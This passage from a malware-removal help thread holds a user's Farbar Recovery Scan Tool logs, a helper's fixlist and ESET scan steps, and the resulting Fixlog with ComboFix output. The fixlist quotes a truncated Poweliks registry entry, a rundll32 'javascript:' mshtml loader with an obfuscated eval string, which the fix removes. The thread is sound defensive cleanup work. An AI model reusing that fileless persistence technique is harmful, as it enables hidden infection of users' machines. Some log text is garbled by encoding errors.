2013-03-09 00:09 - 2014-07-28 19:10 - 00060928 _____ () Q:\Program Files\Winamp\Plugins\pmp_android.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00060928 _____ () Q:\Program Files\Winamp\Plugins\pmp_cloud.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00173056 _____ () Q:\Program Files\Winamp\Plugins\pmp_ipod.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00020992 _____ () Q:\Program Files\Winamp\Plugins\pmp_njb.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00118272 _____ () Q:\Program Files\Winamp\Plugins\pmp_p4s.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00053760 _____ () Q:\Program Files\Winamp\Plugins\pmp_usb.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00103936 _____ () Q:\Program Files\Winamp\Plugins\pmp_wifi.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00029184 _____ () Q:\Program Files\Winamp\Plugins\ml_bookmarks.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00054272 _____ () Q:\Program Files\Winamp\Plugins\ml_history.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00201216 _____ () Q:\Program Files\Winamp\Plugins\ml_disc.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00028672 _____ () Q:\Program Files\Winamp\Plugins\ml_autotag.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00061952 _____ () Q:\Program Files\Winamp\Plugins\ml_impex.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00083456 _____ () Q:\Program Files\Winamp\Plugins\ml_plg.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00033792 _____ () Q:\Program Files\Winamp\Plugins\ml_rg.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00032256 _____ () Q:\Program Files\Winamp\Plugins\ml_transcode.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00025600 _____ () Q:\Program Files\Winamp\Plugins\gen_tray.dll
2013-01-28 23:06 - 2013-03-06 13:11 - 00757248 _____ () Q:\Program Files\Last.fm\unicorn.dll
2013-01-28 23:06 - 2013-03-06 13:11 - 00032768 _____ () Q:\Program Files\Last.fm\logger.dll
2013-01-28 23:06 - 2013-03-05 13:25 - 00350720 _____ () Q:\Program Files\Last.fm\lastfm.dll
2013-01-28 23:06 - 2013-03-06 13:11 - 00126976 _____ () Q:\Program Files\Last.fm\listener.dll
2013-01-28 23:06 - 2013-01-18 11:39 - 00302592 _____ () Q:\Program Files\Last.fm\phonon.dll
2013-03-25 22:06 - 2013-01-18 11:49 - 00182784 _____ () Q:\Program Files\Last.fm\plugins\phonon_backend\phonon_vlc.dll
2013-01-28 23:06 - 2012-12-13 00:12 - 00111104 _____ () Q:\Program Files\Last.fm\libvlc.dll
2013-01-28 23:06 - 2012-12-13 00:13 - 02286592 _____ () Q:\Program Files\Last.fm\libvlccore.dll
2013-03-25 22:06 - 2012-12-13 00:13 - 00049664 _____ () Q:\Program Files\Last.fm\plugins\audio_output\libaout_directx_plugin.dll
2010-07-15 21:35 - 2010-07-15 21:35 - 00573440 _____ () Q:\Program Files\VistaMaster\VistaMaster.Helper.dll
2014-07-22 00:10 - 2014-07-15 05:24 - 14664008 _____ () C:\Program Files\Google\Chrome\Application\36.0.1985.125\PepperFlash\pepflashplayer.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:EBAA0CD9
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Conew Rescue Service => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\IMFservice => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Conew Rescue Service => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\Services: AntiARPClientLoader => 2
MSCONFIG\Services: Nero BackItUp Scheduler 3 => 3
MSCONFIG\Services: NitroReaderDriverReadSpool => 3
MSCONFIG\Services: ServiceLayer => 3
MSCONFIG\Services: ZhuDongFangYu => 
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^PPTV.lnk => 
MSCONFIG\startupfolder: C:^Users^THINK^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^监视墨水警告 - .lnk => C:\windows\pss\监视墨水警告 - .lnk.Startup
MSCONFIG\startupfolder: C:^Users^THINK^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^监视墨水警告 - HP Officejet Pro 8600 (网络).lnk => C:\windows\pss\监视墨水警告 - HP Officejet Pro 8600 (网络).lnk.Startup
MSCONFIG\startupreg: APSDaemon => "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: Creative SB Monitoring Utility => RunDll32 sbavmon.dll,SBAVMonitor
MSCONFIG\startupreg: iTunesHelper => "Q:\Program Files\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: renrenservice => "C:\Users\THINK\AppData\Roaming\renren.com\RenRenService.exe" /background
 
==================== Faulty Device Manager Devices =============
 
Name: A5KFHFES IDE Controller
Description: A5KFHFES IDE Controller
Class Guid: {4D36E97B-E325-11CE-BFC1-08002BE10318}
Manufacturer: 
Service: atytwtun
Problem: : Windows cannot load the device driver for this hardware. The driver may be corrupted or missing. (Code 39)
Resolution: Reasons for this error include a driver that is not present; a binary file that is corrupt; a file I/O problem, or a driver that references an entry point in another binary file that could not be loaded.
Uninstall the driver, and then click "Scan for hardware changes" to reinstall or upgrade the driver.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (09/15/2014 04:58:06 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: WmiApRplC:\Windows\system32\wbem\WmiApRpl.dll4
 
Error: (09/15/2014 04:58:04 PM) (Source: PerfNet) (EventID: 2004) (User: )
Description: 
 
Error: (09/15/2014 04:58:03 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: MSDTCC:\windows\system32\msdtcuiu.DLL4
 
Error: (09/15/2014 04:58:02 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: LsaC:\windows\system32\Secur32.dll4
 
Error: (09/15/2014 04:58:02 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: ESENTC:\windows\system32\esentprf.dll4
 
Error: (09/15/2014 04:58:02 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: .NETFrameworkC:\windows\system32\mscoree.dll4
 
Error: (09/15/2014 04:34:22 PM) (Source: PerfNet) (EventID: 2004) (User: )
Description: 
 
Error: (09/15/2014 04:28:22 PM) (Source: PerfNet) (EventID: 2004) (User: )
Description: 
 
Error: (09/15/2014 04:26:13 PM) (Source: PerfNet) (EventID: 2004) (User: )
Description: 
 
Error: (09/15/2014 01:44:41 PM) (Source: PerfNet) (EventID: 2004) (User: )
Description: 
 
 
System errors:
=============
 
Microsoft Office Sessions:
=========================
Error: (10/24/2013 06:51:22 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.6665.5003, Microsoft Office Version: 12.0.6612.1000. This session lasted 1100 seconds with 780 seconds of active time.  This session ended with a crash.
 
Error: (07/11/2013 09:31:47 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 1309 seconds with 240 seconds of active time.  This session ended with a crash.
 
Error: (05/14/2013 02:52:10 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 15097 seconds with 7380 seconds of active time.  This session ended with a crash.
 
Error: (04/12/2012 06:31:37 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6425.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 25372 seconds with 14820 seconds of active time.  This session ended with a crash.
 
Error: (03/29/2012 01:50:22 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6423.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 7 seconds with 0 seconds of active time.  This session ended with a crash.
 
 
CodeIntegrity Errors:
===================================
  Date: 2014-09-15 17:15:06.800
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-09-15 17:15:06.595
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-09-15 17:15:06.390
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-09-15 17:15:06.157
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-09-15 17:14:41.058
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-09-15 17:14:40.849
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-09-15 17:14:40.588
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-09-15 17:14:40.364
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-09-15 17:13:58.186
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\360AvFlt.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-09-15 17:13:57.982
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\360AvFlt.sys because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™2 Duo CPU P8400 @ 2.26GHz
Percentage of memory in use: 54%
Total physical RAM: 3065.07 MB
Available physical RAM: 1400.96 MB
Total Pagefile: 5016.04 MB
Available Pagefile: 2570.06 MB
Total Virtual: 2047.88 MB
Available Virtual: 1920.55 MB
 
==================== Drives ================================
 
Drive c: (SW_Preload) (Fixed) (Total:46.31 GB) (Free:5.02 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive f: (Games) (Fixed) (Total:35.1 GB) (Free:7.21 GB) NTFS
Drive g: (Video) (Fixed) (Total:65.13 GB) (Free:41.21 GB) NTFS
Drive h: (Music) (Fixed) (Total:65.34 GB) (Free:3.58 GB) NTFS
Drive q: (Lenovo) (Fixed) (Total:19.54 GB) (Free:4.69 GB) NTFS
Drive s: (SERVICEV003) (Fixed) (Total:1.46 GB) (Free:0.34 GB) NTFS ==>[System with boot components (obtained from reading drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 232.9 GB) (Disk ID: E6744A16)
Partition 1: (Active) - (Size=1.5 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=46.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=19.5 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=165.6 GB) - (Type=05)
 
==================== End Of Log ============================


#4 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:34 PM

Posted 15 September 2014 - 05:04 PM

Hello Jay,

here are the next steps for you:


Step 1

Please download this attached Attached File  fixlist.txt   534bytes   20 downloads and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button.
  • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
    Please copy and paste its contents in your next reply.


Step 2

Please download the ESET Online Scanner and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start esetsmartinstaller_enu.exe with administartor privileges.
  • Select the option Yes, I accept the Terms of Use and click on Start.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Click on Start. The virus signature database will begin to download. This may take some time.
  • When completed the Online Scan will begin automatically.
    Note: This scan might take a long time! Please be patient.
  • When completed select Uninstall application on close if you so wish, but make sure you copy the logfile first!
  • Now click on Finish
  • A log file is created at C:\Program Files\ESET\EsetOnlineScanner\log.txt.
    Copy and paste the content of this log file in your next reply.
Note: Do not forget to re-enable your antivirus application after running the above scan!



Step 3

Start FRST with administator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste this log in your next reply.


#5 firzenj

firzenj
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:07:34 AM

Posted 15 September 2014 - 09:17 PM

Thx:)  powershell and dllhost stop to flash in the task manager.

 

 

Fixlog.txt:

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 12-09-2014
Ran by THINK at 2014-09-15 18:08:59 Run:2
Running from C:\Users\THINK\Desktop
Boot Mode: Normal
 
==============================================
 
Content of fixlist:
*****************
CloseProcesses:
HKU\S-1-5-21-55330172-1766457534-1491637609-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Task: {4237464F-3E47-4C1D-8285-1E21C40AAE67} - System32\Tasks\{AF5E48FE-C0D2-FAE1-AFA0-F804CFB8B7DB} => C:\Users\THINK\AppData\Roaming\wygiusy.dll/s "C:\Users\THINK\AppData\Roaming\wygiusy.dll"
C:\Users\THINK\AppData\Roaming\wygiusy.dll
CMD: type C:\ComboFix.txt
EmptyTemp:
*****************
 
Processes closed successfully.
"HKU\S-1-5-21-55330172-1766457534-1491637609-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-55330172-1766457534-1491637609-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4237464F-3E47-4C1D-8285-1E21C40AAE67}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4237464F-3E47-4C1D-8285-1E21C40AAE67}" => Key deleted successfully.
C:\Windows\System32\Tasks\{AF5E48FE-C0D2-FAE1-AFA0-F804CFB8B7DB} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{AF5E48FE-C0D2-FAE1-AFA0-F804CFB8B7DB}" => Key deleted successfully.
"C:\Users\THINK\AppData\Roaming\wygiusy.dll" => File/Directory not found.
 
=========  type C:\ComboFix.txt =========
 
ComboFix 14-09-14.01 - THINK 14/09/14  13:19:17.1.2 - x86 NETWORK
ִλ: c:\users\THINK\Desktop\ComboFix.exe
AV: 360ɱ *Enabled/Updated* {6F7A6B22-2309-7CD0-AF79-D11A4916C60C}
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * ɹ»ԭ
.
.
(((((((((((((((((((((((((((((((((((((((   ɾĵ   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
C:\360Rec
c:\360rec\20140902\122AEF5.vir
C:\CFLog
c:\cflog\UDPCheckErrorInfo.txt
C:\desktop.ini
c:\program files\Virtual Camara
c:\program files\Virtual Camara\BlueHorn.smf
c:\program files\Virtual Camara\SkinMagicTrial.dll
c:\program files\Virtual Camara\Uninstall.exe
c:\program files\Virtual Camara\vcam.jpg
c:\program files\Virtual Camara\VCamMainSvr.exe
c:\program files\Virtual Camara\VCamTransFilter.ax
c:\program files\Virtual Camara\VirtualCam.ax
c:\program files\WinPCap
c:\program files\WinPCap\daemon_mgm.exe
c:\program files\WinPCap\INSTALL.LOG
c:\program files\WinPCap\npf_mgm.exe
c:\program files\WinPCap\rpcapd.exe
c:\program files\WinPCap\Uninstall.exe
c:\programdata\114la.ico
c:\programdata\avbase.dat
c:\programdata\Roaming
c:\programdata\Roaming\Intel\Wireless\Settings\Settings.ini
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer\Bin\flash_wk.dll
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer\Bin\malurl.dat
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer\datapack1
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer\datapack2
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer\datapack3
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer\MetaSearch\metasearchupdate1
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer\MetaSearch\metasearchupdate2
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer\script.dat
c:\users\Administrator.THINK-PC\AppData\Roaming\SogouExplorer\urlblack.dat
c:\users\Default\AppData\Roaming\SogouExplorer
c:\users\Default\AppData\Roaming\SogouExplorer\Bin\flash_wk.dll
c:\users\Default\AppData\Roaming\SogouExplorer\Bin\malurl.dat
c:\users\Default\AppData\Roaming\SogouExplorer\datapack1
c:\users\Default\AppData\Roaming\SogouExplorer\datapack2
c:\users\Default\AppData\Roaming\SogouExplorer\datapack3
c:\users\Default\AppData\Roaming\SogouExplorer\MetaSearch\metasearchupdate1
c:\users\Default\AppData\Roaming\SogouExplorer\MetaSearch\metasearchupdate2
c:\users\Default\AppData\Roaming\SogouExplorer\script.dat
c:\users\Default\AppData\Roaming\SogouExplorer\urlblack.dat
c:\users\THINK\2mc2.2mc
c:\users\THINK\AppData\Local\.#
c:\users\THINK\AppData\Roaming\0000247E6BF153
c:\users\THINK\AppData\Roaming\02001E652A651C
c:\users\THINK\AppData\Roaming\115
c:\users\THINK\AppData\Roaming\115\Box\115Box.exe
c:\users\THINK\AppData\Roaming\115\Box\Drivers\VirtDisk.sys
c:\users\THINK\AppData\Roaming\115\Box\Drivers\VirtDisk64.sys
c:\users\THINK\AppData\Roaming\115\Box\sqlite3.dll
c:\users\THINK\AppData\Roaming\115\Box\Sync115Ext.dll
c:\users\THINK\AppData\Roaming\360SE
c:\users\THINK\AppData\Roaming\360SE\360SE.ini
c:\users\THINK\AppData\Roaming\baidu\hao123
c:\users\THINK\AppData\Roaming\baidu\hao123\hao123.1.0.0.1097.exe
c:\users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Virtual Camara
c:\users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Virtual Camara\Uninstall.lnk
c:\users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Virtual Camara\Virtual Camara.lnk
c:\users\THINK\AppData\Roaming\rafzvr.dll
c:\users\THINK\AppData\Roaming\SogouExplorer
c:\windows\apppatch\AppLoc.exe
c:\windows\AppPatch\Custom\{deb7008b-681e-4a4a-8aae-cc833e8216ce}.sdb
c:\windows\desktop
c:\windows\Downloaded Program Files\375291
c:\windows\Downloaded Program Files\655368
c:\windows\iun6002.exe
c:\windows\msvcr71.dll
c:\windows\SuperHidden.vbs
c:\windows\system32\1.txt
c:\windows\system32\drivers\npf.sys
c:\windows\system32\kindling.dll
c:\windows\system32\Packet.dll
c:\windows\system32\pthreadVC.dll
c:\windows\system32\SARCheck.dll
c:\windows\system32\SET10F8.tmp
c:\windows\system32\SET91ED.tmp
c:\windows\system32\SET925E.tmp
c:\windows\system32\u
c:\windows\system32\WanPacket.dll
c:\windows\system32\WinKawaks.ini
c:\windows\system32\wpcap.dll
c:\windows\system32\YingInstall
c:\windows\system32\YingInstall\804.ini
c:\windows\wininit.ini
c:\windows\Ying-UnInstall.exe
G:\360Downloads
Q:\360Downloads
q:\favoritevideo\InvisibleFolder
q:\favoritevideo\InvisibleFolder\peer_2.4.0.8326.dll.tpp
.
ܸȾ c:\windows\system32\userinit.exe ҳɹⶾ 
- c:\windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.0.6001.18000_none_dc28ba15d1aff80b\userinit.exe ָԭ 
.
.
(((((((((((((((((((((((((((((((((((((((   /   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
-------\Legacy_NPF
-------\Legacy_PROTECTOR
-------\Legacy_TESSAFE
-------\Service_NPF
-------\Service_Protector
-------\Service_TesSafe
.
.
(((((((((((((((((((((((((  2014-08-14 2014-09-14 µĵ  )))))))))))))))))))))))))))))))
.
.
2014-09-14 16:49 . 2014-09-14 16:54 -------- d-----w- C:\FRST
2014-09-14 05:20 . 2014-09-14 05:20 -------- d-----w- c:\programdata\ksrbm
2014-09-14 03:58 . 2010-10-21 18:23 48536 ----a-w- c:\windows\system32\drivers\krpr.sys
2014-09-12 23:10 . 2014-09-12 23:10 -------- d-sh--w- c:\users\THINK\AppData\Roaming\360Quarant
2014-09-12 23:05 . 2014-07-02 16:07 358984 ----a-w- c:\windows\system32\drivers\Kemon.sys
2014-09-11 03:45 . 2014-09-11 03:45 -------- d-----w- c:\users\Public\SogouInput
2014-09-11 03:44 . 2014-09-11 03:44 0 ----a-w- c:\windows\system32\nsyF3B8.tmp
2014-09-10 06:04 . 2014-09-10 06:04 -------- d-----w- c:\users\THINK\AppData\Roaming\Foxit Software
2014-09-08 18:32 . 2014-09-08 18:32 -------- d-----w- c:\programdata\LocalStorage
2014-09-08 18:29 . 2014-09-08 18:29 -------- d-----w- c:\users\THINK\AppData\Roaming\IQIYI Video
2014-09-08 18:28 . 2014-09-08 18:29 -------- d-----w- c:\users\Public\QiYi
2014-09-06 23:55 . 2014-09-06 23:55 -------- d-----w- c:\users\THINK\AppData\Local\thunder network
2014-08-27 01:49 . 2014-08-27 01:49 2048 ----a-w- c:\windows\system32\tzres.dll
2014-08-27 01:48 . 2014-08-27 01:48 638400 ----a-w- c:\windows\system32\drivers\dxgkrnl.sys
2014-08-27 01:48 . 2014-08-27 01:48 37376 ----a-w- c:\windows\system32\cdd.dll
2014-08-27 01:48 . 2014-08-27 01:48 82432 ----a-w- c:\windows\system32\consent.exe
2014-08-27 01:48 . 2014-08-27 01:48 332800 ----a-w- c:\windows\system32\msihnd.dll
2014-08-27 01:48 . 2014-08-27 01:48 33280 ----a-w- c:\windows\system32\appinfo.dll
2014-08-27 01:48 . 2014-08-27 01:48 2263552 ----a-w- c:\windows\system32\msi.dll
2014-08-27 01:48 . 2014-08-27 01:48 1993728 ----a-w- c:\windows\system32\authui.dll
2014-08-27 01:43 . 2014-08-27 01:43 768512 ----a-w- c:\program files\Common Files\Microsoft Shared\vgx\VGX.dll
2014-08-27 01:42 . 2014-08-27 01:42 1305088 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\tipskins.dll
2014-08-27 01:42 . 2014-08-27 01:42 2051072 ----a-w- c:\windows\system32\win32k.sys
2014-08-27 01:42 . 2014-08-27 01:42 149504 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\tabskb.dll
2014-08-27 01:42 . 2014-08-27 01:42 114688 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\TipBand.dll
2014-08-27 01:42 . 2014-08-27 01:42 983552 ----a-w- c:\program files\Windows Journal\JNTFiltr.dll
2014-08-27 01:42 . 2014-08-27 01:42 965120 ----a-w- c:\program files\Windows Journal\JNWDRV.dll
2014-08-27 01:42 . 2014-08-27 01:42 1218048 ----a-w- c:\program files\Windows Journal\NBDoc.DLL
2014-08-27 01:42 . 2014-08-27 01:42 937472 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\journal.dll
2014-08-27 01:42 . 2014-08-27 01:42 506880 ----a-w- c:\windows\system32\qedit.dll
2014-08-27 01:42 . 2014-08-27 01:42 1401344 ----a-w- c:\windows\system32\msxml6.dll
2014-08-27 01:42 . 2014-08-27 01:42 1248768 ----a-w- c:\windows\system32\msxml3.dll
2014-08-27 01:41 . 2014-08-27 01:41 502784 ----a-w- c:\windows\system32\usp10.dll
2014-08-27 01:41 . 2014-08-27 01:41 915392 ----a-w- c:\windows\system32\drivers\tcpip.sys
2014-08-27 01:41 . 2014-08-27 01:41 31232 ----a-w- c:\windows\system32\drivers\tcpipreg.sys
2014-08-27 01:40 . 2014-08-27 01:40 876032 ----a-w- c:\windows\system32\wer.dll
2014-08-24 14:48 . 2014-08-24 14:48 -------- d-----w- C:\$360Section
2014-08-19 05:50 . 2014-08-19 05:50 3695208 ----a-w- c:\windows\system32\SogouPY.ime
.
.
.
((((((((((((((((((((((((((((((((((((((((   ڱ޸ĵĵ   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-09-12 22:56 . 2012-04-05 23:23 701104 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-09-12 22:56 . 2011-05-13 01:14 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-07-22 03:01 . 2014-07-22 03:01 335360 ----a-w- c:\windows\system32\SysFxUI.dll
2014-07-22 03:01 . 2014-07-22 03:01 167936 ----a-w- c:\windows\system32\drivers\portcls.sys
2014-07-22 03:01 . 2014-07-22 03:01 130048 ----a-w- c:\windows\system32\drivers\drmk.sys
2014-07-22 03:01 . 2008-01-21 02:23 1304064 ----a-w- c:\windows\system32\WMALFXGFXDSP.dll
2014-07-22 03:01 . 2014-07-22 03:01 158208 ----a-w- c:\windows\system32\imagehlp.dll
2014-07-22 03:01 . 2014-07-22 03:01 36864 ----a-w- c:\windows\system32\wshcon.dll
2014-07-22 03:01 . 2014-07-22 03:01 172032 ----a-w- c:\windows\system32\scrrun.dll
2014-07-22 03:01 . 2014-07-22 03:01 155648 ----a-w- c:\windows\system32\wscript.exe
2014-07-22 03:01 . 2014-07-22 03:01 135168 ----a-w- c:\windows\system32\cscript.exe
2014-07-22 03:01 . 2014-07-22 03:01 131072 ----a-w- c:\windows\system32\wshom.ocx
2014-07-22 03:00 . 2014-07-22 03:00 596480 ----a-w- c:\windows\system32\FWPUCLNT.DLL
2014-07-22 03:00 . 2014-07-22 03:00 444928 ----a-w- c:\windows\system32\IKEEXT.DLL
2014-07-22 03:00 . 2014-07-22 03:00 993792 ----a-w- c:\windows\system32\crypt32.dll
2014-07-22 03:00 . 2014-07-22 03:00 297984 ----a-w- c:\windows\system32\gdi32.dll
2014-07-22 02:59 . 2014-07-22 02:59 24576 ----a-w- c:\windows\system32\cryptdlg.dll
2014-07-22 02:59 . 2014-07-22 02:59 102608 ----a-w- c:\windows\system32\PresentationCFFRasterizerNative_v0300.dll
2014-07-22 02:58 . 2014-07-22 02:58 25472 ----a-w- c:\windows\system32\drivers\hidparse.sys
2014-07-22 02:58 . 2014-07-22 02:58 73216 ----a-w- c:\windows\system32\drivers\usbccgp.sys
2014-07-22 02:58 . 2014-07-22 02:58 6016 ----a-w- c:\windows\system32\drivers\usbd.sys
2014-07-22 02:58 . 2014-07-22 02:58 39936 ----a-w- c:\windows\system32\drivers\usbehci.sys
2014-07-22 02:58 . 2014-07-22 02:58 23552 ----a-w- c:\windows\system32\drivers\usbuhci.sys
2014-07-22 02:58 . 2014-07-22 02:58 226304 ----a-w- c:\windows\system32\drivers\usbport.sys
2014-07-22 02:58 . 2014-07-22 02:58 197632 ----a-w- c:\windows\system32\drivers\usbhub.sys
2014-07-22 02:58 . 2008-01-21 02:23 15872 ----a-w- c:\windows\system32\hcrstco.dll
2014-07-22 02:58 . 2006-11-02 08:55 8704 ----a-w- c:\windows\system32\hccoin.dll
2014-07-22 02:58 . 2014-07-22 02:58 532480 ----a-w- c:\windows\system32\comctl32.dll
2014-07-22 02:57 . 2014-07-22 02:57 527064 ----a-w- c:\windows\system32\drivers\Wdf01000.sys
2014-07-22 02:57 . 2014-07-22 02:57 134272 ----a-w- c:\windows\system32\drivers\usbvideo.sys
2014-07-22 02:57 . 2014-07-22 02:57 798208 ----a-w- c:\windows\system32\FntCache.dll
2014-07-22 02:57 . 2014-07-22 02:57 683008 ----a-w- c:\windows\system32\d2d1.dll
2014-07-22 02:57 . 2014-07-22 02:57 486400 ----a-w- c:\windows\system32\d3d10level9.dll
2014-07-22 02:57 . 2014-07-22 02:57 219648 ----a-w- c:\windows\system32\d3d10_1core.dll
2014-07-22 02:57 . 2014-07-22 02:57 189952 ----a-w- c:\windows\system32\d3d10core.dll
